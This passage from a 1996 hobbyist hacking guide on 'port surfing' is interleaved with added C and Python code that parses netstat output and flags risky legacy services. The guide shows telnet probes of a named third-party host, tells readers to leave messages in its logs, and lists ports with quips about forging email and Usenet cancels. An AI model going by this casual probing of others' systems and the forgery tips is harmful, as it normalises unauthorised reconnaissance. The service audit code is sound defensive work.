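/* Constructed subset of the MultiNet netstat lines shown above. */
static const char *SAMPLE_NETSTAT =
    "TCP 0 822 GRANDE.NM.ORG(NETSTAT) 198.59.115.24(1569) ESTABLISHED\n"
    "TCP 0 0 *(NAMESERVICE) *(*) LISTEN\n"
    "TCP 0 0 *(TELNET) *(*) LISTEN\n"
    "TCP 0 0 *(FTP) *(*) LISTEN\n"
    "TCP 0 0 *(FINGER) *(*) LISTEN\n"
    "TCP 0 0 *(NETSTAT) *(*) LISTEN\n"
    "TCP 0 0 *(SMTP) *(*) LISTEN\n"
    "TCP 0 0 *(LOGIN) *(*) LISTEN\n"
    "TCP 0 0 *(SHELL) *(*) LISTEN\n"
    "TCP 0 0 *(EXEC) *(*) LISTEN\n"
    "TCP 0 0 *(CHARGEN) *(*) LISTEN\n"
    "TCP 0 0 *(ECHO) *(*) LISTEN\n"
    "TCP 0 0 GRANDE.NM.ORG(4174) OSO.NM.ORG(X11) ESTABLISHED\n"
    "UDP 0 0 *(TFTP) *(*)\n";

/* Editor's list, not the page's: the r-commands (LOGIN, SHELL, EXEC) trust
 * the caller's address, NETSTAT/SYSTAT/FINGER hand out reconnaissance for
 * free, the small test services can be bounced at third parties, and TFTP
 * asks for no password at all. */
static const char *RISKY[] = { "LOGIN", "SHELL", "EXEC", "NETSTAT", "SYSTAT",
                               "FINGER", "CHARGEN", "ECHO", "DISCARD", "DAYTIME",
                               "TFTP", NULL };

int is_risky_service(const char *name)
{
    int i;
    for (i = 0; RISKY[i]; i++)
        if (strcmp(name, RISKY[i]) == 0) return 1;
    return 0;
}

/* One line: "PROTO RCVQ SNDQ local(PORT) foreign(PORT) [STATE]". UDP lines
 * carry no state. Returns 1 and fills proto/service/state, 0 if the line is
 * not a socket line (headers, separators, the routing table that follows). */
int parse_netstat_line(const char *line, char *proto, char *service, char *state)
{
    char local[64], foreign[64];
    const char *lp, *rp;
    int rcvq, sndq, n;
    state[0] = '\0';
    n = sscanf(line, "%7s %d %d %63s %63s %15s", proto, &rcvq, &sndq, local, foreign, state);
    if (n < 5) return 0;
    lp = strchr(local, '(');
    rp = strrchr(local, ')');
    if (!lp || !rp || rp <= lp || rp - lp - 1 >= 32) return 0;
    memcpy(service, lp + 1, rp - lp - 1);
    service[rp - lp - 1] = '\0';
    return 1;
}

/* Count sockets waiting for callers (TCP in LISTEN, any bound UDP socket)
 * and append the risky ones, space separated, to flagged[]. */
int audit_listeners(const char *text, char *flagged, size_t cap)
{
    char line[256], proto[8], service[32], state[16];
    const char *p = text;
    int listeners = 0;
    flagged[0] = '\0';
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t full = nl ? (size_t)(nl - p) : strlen(p);
        size_t len = full < sizeof line ? full : sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        p += full + (nl ? 1 : 0);
        if (!parse_netstat_line(line, proto, service, state)) continue;
        if (strcmp(proto, "TCP") == 0 && strcmp(state, "LISTEN") != 0) continue;
        if (strcmp(proto, "TCP") != 0 && strcmp(proto, "UDP") != 0) continue;
        listeners++;
        if (is_risky_service(service) && strlen(flagged) + strlen(service) + 2 <= cap) {
            if (flagged[0]) strcat(flagged, " ");
            strcat(flagged, service);
        }
    }
    return listeners;
}

/* Run the audit over the embedded sample; the result is kept in static
 * storage so it can be read back after the call. */
static char sample_flagged[128];
int audit_sample_count(void) { return audit_listeners(SAMPLE_NETSTAT, sample_flagged, sizeof sample_flagged); }
const char *audit_sample_flagged(void) { audit_sample_count(); return sample_flagged; }

int main(void)
{
    printf("%d sockets waiting for callers; risky: %s\n", audit_sample_count(), audit_sample_flagged());
    return 0;
}
```

Run against the full listing above it would also flag SYSTAT, DAYTIME and DISCARD; everything it names is reachable by anyone who can telnet to port 15, which is exactly what the page is about to show.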
[The dump went on for many more lines: the MultiNet IP routing tables, IPX routing tables, ARP table, network interface statistics, protocol statistics and buffer statistics. They are omitted here.]

Connection closed by foreign host
<slug> [68] ->

Whoa! What was all that?
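Before the guide explains that listing, here is an added example (not code from the guide) that parses MultiNet-style netstat lines like the ones above, picks out the sockets that accept traffic from anywhere, and attaches a triage note to the legacy services a sysadmin would want switched off. The sample lines and the risk notes are this example's own, constructed to match the format shown above.

```python
import re

# Constructed sample in the MultiNet netstat format the guide shows:
# "PROTO recv-q send-q local(port) remote(port) [state]".
SAMPLE_NETSTAT = """\
TCP 0 822 GRANDE.NM.ORG(NETSTAT) 198.59.115.24(1569) ESTABLISHED
TCP 0 0 *(TELNET) *(*) LISTEN
TCP 0 0 *(FINGER) *(*) LISTEN
TCP 0 0 *(NETSTAT) *(*) LISTEN
TCP 0 0 *(SHELL) *(*) LISTEN
TCP 0 0 *(POP3) *(*) LISTEN
UDP 0 0 *(CHARGEN) *(*)
UDP 0 0 *(SNMP) *(*)
"""

# Triage notes for the legacy services the guide's port table calls out.
# Assumption: this policy is the example's own, not the guide's.
RISK = {
    "FINGER": "user enumeration to anonymous clients; disable fingerd",
    "NETSTAT": "discloses every connection and route; disable",
    "SYSTAT": "lists logged-in users to anyone; disable",
    "SHELL": "rsh, trust-based and passwordless; replace with ssh",
    "LOGIN": "rlogin, trust-based; replace with ssh",
    "TELNET": "cleartext login; replace with ssh",
    "CHARGEN": "unauthenticated traffic generator; disable",
    "ECHO": "unauthenticated reflector; disable",
}

LINE_RE = re.compile(
    r"^(?P<proto>TCP|UDP)\s+\d+\s+\d+\s+"
    r"(?P<laddr>\S+)\((?P<lport>[^)]+)\)\s+"
    r"(?P<raddr>\S+)\((?P<rport>[^)]+)\)"
    r"(?:\s+(?P<state>\S+))?$"
)

def parse_netstat(text):
    """Return one dict per parsable line; header and other lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append(m.groupdict())
    return rows

def listeners(rows):
    """(proto, service) for sockets that accept from anywhere: TCP rows in
    LISTEN, and UDP rows bound with a wildcard peer (UDP has no state)."""
    out = []
    for r in rows:
        if r["proto"] == "TCP" and r["state"] == "LISTEN":
            out.append((r["proto"], r["lport"]))
        elif r["proto"] == "UDP" and (r["raddr"], r["rport"]) == ("*", "*"):
            out.append((r["proto"], r["lport"]))
    return out

def flag_risky(rows):
    """Listeners that match the policy, with their note, in stable order."""
    return sorted((p, s, RISK[s]) for p, s in listeners(rows) if s in RISK)

if __name__ == "__main__":
    for proto, svc, note in flag_risky(parse_netstat(SAMPLE_NETSTAT)):
        print(f"{proto:3} {svc:8} {note}")
```

The ESTABLISHED netstat row is parsed but not counted as a listener, so the report covers only what the host offers to the whole Internet.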

What we did was telnet to port 15 -- the netstat port -- which on some computers runs a daemon that tells anybody who cares to drop in just about everything about the connections made by all the computers linked to the Internet through this computer.

So from this we learned two things:

1) Grande.nm.org is a very busy and important computer.
2) Even a very busy and important computer can let the random port surfer come and play.

So my lady friend wanted to try out another port. I suggested the finger port, number 79. So she gave the command:

<slug> [68] ->telnet grande.nm.org 79
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
finger
?Sorry, could not find "FINGER"
Connection closed by foreign host
<slug> [69] ->telnet grande.nm.org 79
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
help
?Sorry, could not find "HELP"
Connection closed by foreign host
<slug> [69] ->telnet grande.nm.org 79
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
?
?Sorry, could not find "?"
Connection closed by foreign host
<slug> [69] ->telnet grande.nm.org 79
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
man
?Sorry, could not find "MAN"
Connection closed by foreign host
<slug> [69] ->

At first this looks like just a bunch of failed commands. But actually this is pretty fascinating. The reason is that port 79 is, under IETF rules, supposed to run fingerd, the finger daemon. So when she gave the command "finger" and grande.nm.org said ?Sorry, could not find "FINGER," we knew this port was not following IETF rules.

Now on many computers they don't run the finger daemon at all. This is because finger has some properties that can be used to gain total control of the computer that runs it. But if finger is shut down, and nothing else is running on port 79, we would get the answer:

telnet: connect: Connection refused

But instead we got connected and grande.nm.org was waiting for a command.

Now the normal thing a port surfer does when running an unfamiliar daemon is to coax it into revealing what commands it uses. "Help," "?" and "man" often work. But it didn't help us.

But even though these commands didn't help us, they did tell us that the daemon is probably something sensitive. If it were a daemon that was meant for anybody and his brother to use, it would have given us instructions.

So what did we do next? We decided to be good Internet citizens and also stay out of jail. We decided we'd better log off. But there was one hack we decided to do first: leave our mark on the shell log file.

The shell log file keeps a record of all operating system commands made on a computer. The administrator of an obviously important computer such as grande.nm.org is probably competent enough to scan the records of what commands are given by whom to his computer. Especially on a port important enough to be running a mystery, non-IETF daemon. So everything we typed while connected was saved on a log.

So my friend giggled with glee and left a few messages on port 79 before logging off. Oh, dear, I do believe she's hooked on hacking. Hmmm, it could be a good way to meet cute sysadmins...

So, port surf's up! If you want to surf, here's the basics:

1) Get logged on to a shell account. That's an account with your ISP that lets you give Unix commands. Or -- run Linux or some other kind of Unix on your PC and hook up to the Internet.
2) Give the command "telnet <hostname> <port number>" where <hostname> is the Internet address of the computer you want to visit and <port number> is whatever looks phun to you.
3) If you get the response "connected to <hostname>," then surf's up!

Following are some of my favorite ports. It is legal and harmless to pay them visits so long as you don't figure out how to gain superuser status while playing with them. However, please note that if you do too much port surfing from your shell account, your sysadmin may notice this in his or her shell log file. If he or she is prejudiced against hacking, you may get kicked off your ISP. So you may want to explain in advance that you are merely a harmless hacker looking to have a good time, er, um, learn about Unix. Yeh, that sounds good...

Port number  Service   Why it's phun!
7            echo      Whatever you type in, the host repeats back to you, used for ping
9            discard   Dev/null -- how fast can you figure out this one?
11           systat    Lots of info on users
13           daytime   Time and date at computer's location
15           netstat   Tremendous info on networks but rarely used any more
19           chargen   Pours out a stream of ASCII characters. Use ^C to stop.
21           ftp       Transfers files
22           ssh       Secure shell login -- encrypted tunnel
23           telnet    Where you log in if you don't use ssh :)
25           smtp      Forge email from Bill.Gates@Microsoft.org
37           time      Time
39           rlp       Resource location
43           whois     Info on hosts and networks
53           domain    Nameserver
70           gopher    Out-of-date info hunter
79           finger    Lots of info on users
80           http      Web server
110          pop       Incoming email
119          nntp      Usenet news groups -- forge posts, cancels
443          shttp     Another web server
512          biff      Mail notification
513          rlogin    Remote login
             who       Remote who and uptime
514          shell     Remote command, no password used!
             syslog    Remote system logging -- how we bust hackers
520          route     Routing information protocol

**********************************************************************
Propeller head tip: Note that in most cases an Internet host will use these port number assignments for these services. More than one service may also be assigned simultaneously to the same port. This numbering system is voluntarily offered by the Internet Engineering Task Force (IETF). That means that an Internet host may use other ports for these services. Expect the unexpected! If you have a copy of Linux, you can get the list of all the IETF assignments of port numbers in the file /etc/services.
**********************************************************************

To subscribe to the Happy Hacker list, email hacker@techbroker.com with message "subscribe hh." Send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com. Happy hacking!

Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end..
